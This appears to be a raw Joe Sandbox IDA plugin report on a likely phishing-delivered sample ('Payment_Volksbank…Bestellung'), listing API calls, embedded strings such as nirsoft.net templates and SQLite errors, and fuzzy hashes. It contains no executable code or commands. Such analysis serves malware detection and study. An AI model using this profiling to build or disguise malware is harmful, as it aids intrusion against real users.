• Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
APIs
Strings
Similarity
• API ID: memset$_snwprintf
• String ID: %%0.%df
• API String ID: 3473751417-763548558
• Opcode ID: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
• Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
• Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
APIs
• SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
• KillTimer.USER32(?,00000041), ref: 004060D7
• KillTimer.USER32(?,00000041), ref: 004060E8
• GetTickCount.KERNEL32 ref: 0040610B
• GetParent.USER32(?), ref: 00406136
• SendMessageW.USER32(00000000), ref: 0040613D
• BeginDeferWindowPos.USER32(00000004), ref: 0040614B
• EndDeferWindowPos.USER32(00000000), ref: 0040619B
• InvalidateRect.USER32(?,?,00000001), ref: 004061A7
Strings
Similarity
• API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
• String ID: A
• API String ID: 2892645895-3554254475
• Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
• Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
• Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
APIs
• LoadMenuW.USER32(?,?), ref: 0040D97F
  • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
  • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
  • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
  • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
• DestroyMenu.USER32(00000000), ref: 0040D99D
• CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
• GetDesktopWindow.USER32 ref: 0040D9FD
• CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
• memset.MSVCRT ref: 0040DA23
• GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
• EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
• DestroyWindow.USER32(00000005), ref: 0040DA70
  • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
Strings
Similarity
• API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
• String ID: caption
• API String ID: 973020956-4135340389
• Opcode ID: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
• Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
• Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
APIs
Strings
• <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
• <table dir="rtl"><tr><td>, xrefs: 00410B00
• <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
• <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
Similarity
• API ID: memset$_snwprintf$wcscpy
• String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
• API String ID: 1283228442-2366825230
• Opcode ID: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
• Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
• Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
APIs
• wcschr.MSVCRT ref: 00413972
• wcscpy.MSVCRT ref: 00413982
  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
• wcscpy.MSVCRT ref: 004139D1
• wcscat.MSVCRT ref: 004139DC
• memset.MSVCRT ref: 004139B8
  • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
  • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
• memset.MSVCRT ref: 00413A00
• memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 00413A27
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                                                                                                          • String ID: \systemroot
                                                                                                                                                                                                                                          • API String ID: 4173585201-1821301763
                                                                                                                                                                                                                                          • Opcode ID: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                                                                                                                                                                                          • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: wcscpy
                                                                                                                                                                                                                                          • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                                                                          • API String ID: 1284135714-318151290
                                                                                                                                                                                                                                          • Opcode ID: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                                                                                                                                                                                          • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                                                                                                          • String ID: 0$6
                                                                                                                                                                                                                                          • API String ID: 4066108131-3849865405
                                                                                                                                                                                                                                          • Opcode ID: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                                                                                                                                                                          • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004082EF
                                                                                                                                                                                                                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00408362
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00408377
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$ByteCharMultiWide
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 290601579-0
                                                                                                                                                                                                                                          • Opcode ID: aaab377460abc89c7af8afd87b5e46c7bf1c7e9fcd5a4a68ffd212283bf1634f
                                                                                                                                                                                                                                          • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aaab377460abc89c7af8afd87b5e46c7bf1c7e9fcd5a4a68ffd212283bf1634f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                                                                                                                                                                          • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0044505E
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy$memchrmemset
                                                                                                                                                                                                                                          • String ID: PD$PD
                                                                                                                                                                                                                                          • API String ID: 1581201632-2312785699
                                                                                                                                                                                                                                          • Opcode ID: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                                                                                                                                                                                          • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000010), ref: 00409F61
• GetDC.USER32(00000000), ref: 00409F6E
• GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
• GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
• ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
• GetWindowRect.USER32(?,?), ref: 00409FA0
• GetParent.USER32(?), ref: 00409FA5
• GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
• MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
• String ID:
• API String ID: 2163313125-0
• Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
• Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
• Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
• Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: free$wcslen
• String ID:
• API String ID: 3592753638-3916222277
• Opcode ID: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
• Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
• Opcode Fuzzy Hash: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
• Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
APIs
• memset.MSVCRT ref: 0040A47B
• _snwprintf.MSVCRT ref: 0040A4AE
• wcslen.MSVCRT ref: 0040A4BA
• memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
• wcslen.MSVCRT ref: 0040A4E0
• memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memcpywcslen$_snwprintfmemset
• String ID: %s (%s)$YV@
• API String ID: 3979103747-598926743
• Opcode ID: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
• Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
• Opcode Fuzzy Hash: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
• Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
APIs
• LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
• GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
• FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
• MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: Library$AddressFreeLoadMessageProc
• String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
• API String ID: 2780580303-317687271
• Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
• Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
• Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
• Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
APIs
• LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000,?,00412758,00000000), ref: 0040A686
• FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669), ref: 0040A6A4
• wcslen.MSVCRT ref: 0040A6B1
• wcscpy.MSVCRT ref: 0040A6C1
• LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000), ref: 0040A6CB
• wcscpy.MSVCRT ref: 0040A6DB
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
• String ID: Unknown Error$netmsg.dll
• API String ID: 2767993716-572158859
• Opcode ID: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
• Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
• Opcode Fuzzy Hash: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
• Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
APIs
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
• wcscpy.MSVCRT ref: 0040DAFB
• wcscpy.MSVCRT ref: 0040DB0B
• GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
  • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: PrivateProfilewcscpy$AttributesFileString
• String ID: TranslatorName$TranslatorURL$charset$general$rtl
• API String ID: 3176057301-2039793938
• Opcode ID: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
• Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
• Opcode Fuzzy Hash: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
APIs
Strings
• database %s is already in use, xrefs: 0042F6C5
• cannot ATTACH database within transaction, xrefs: 0042F663
• attached databases must use the same text encoding as main database, xrefs: 0042F76F
• out of memory, xrefs: 0042F865
• database is already attached, xrefs: 0042F721
• unable to open database: %s, xrefs: 0042F84E
• too many attached databases - max %d, xrefs: 0042F64D
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memcpymemset
• String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
• API String ID: 1297977491-2001300268
• Opcode ID: 555983bd08e1e0f26dd17bbb53403158099364c4b4daee471fd2bbf0d1f998cc
• Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
• Opcode Fuzzy Hash: 555983bd08e1e0f26dd17bbb53403158099364c4b4daee471fd2bbf0d1f998cc
• Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
APIs
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
• ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB3F
• ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB5B
• memcpy.MSVCRT(?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB80
• memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB94
• ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC17
• ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,004126A8,00000000), ref: 0040EC21
• ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC59
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
• String ID: ($d
• API String ID: 1140211610-1915259565
• Opcode ID: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
• Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
• Opcode Fuzzy Hash: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
• Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
APIs
• LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
• Sleep.KERNEL32(00000001), ref: 004178E9
• GetLastError.KERNEL32 ref: 004178FB
• UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: File$ErrorLastLockSleepUnlock
• String ID:
• API String ID: 3015003838-0
• Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
• Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
• Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
• Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
APIs
• memset.MSVCRT ref: 00407E44
• memset.MSVCRT ref: 00407E5B
• _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
• _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
• _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
• _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
• wcscpy.MSVCRT ref: 00407F10
